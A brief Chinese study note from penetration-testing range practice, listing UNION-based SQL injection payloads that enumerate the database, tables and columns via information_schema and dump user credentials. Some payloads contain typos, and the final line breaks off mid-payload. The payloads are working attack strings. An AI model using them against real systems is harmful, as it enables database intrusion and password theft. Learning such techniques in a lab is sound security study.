文章目录
前言
学习完渗透入门后进行靶场联系
提示:以下是本篇文章正文内容,下面案例可供参考
一、SQL注入
完全相信用户输入,没有对用户输入进行过滤。
发现SQL注入后,
union select 1,database()# 爆破库
union select 1,group_concat(table_name) from information_schema.tables where table_schema='数据库名#爆破数据表'
union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='表名'#爆破表的行
union select 1,concat(user,password) from users# 爆破user和password
union select 1,concat_ws(char(32,58,32),usesr,password) from user# 其中32为空格58位冒号 显示为user : password
union select 1, concat(@@datadir,@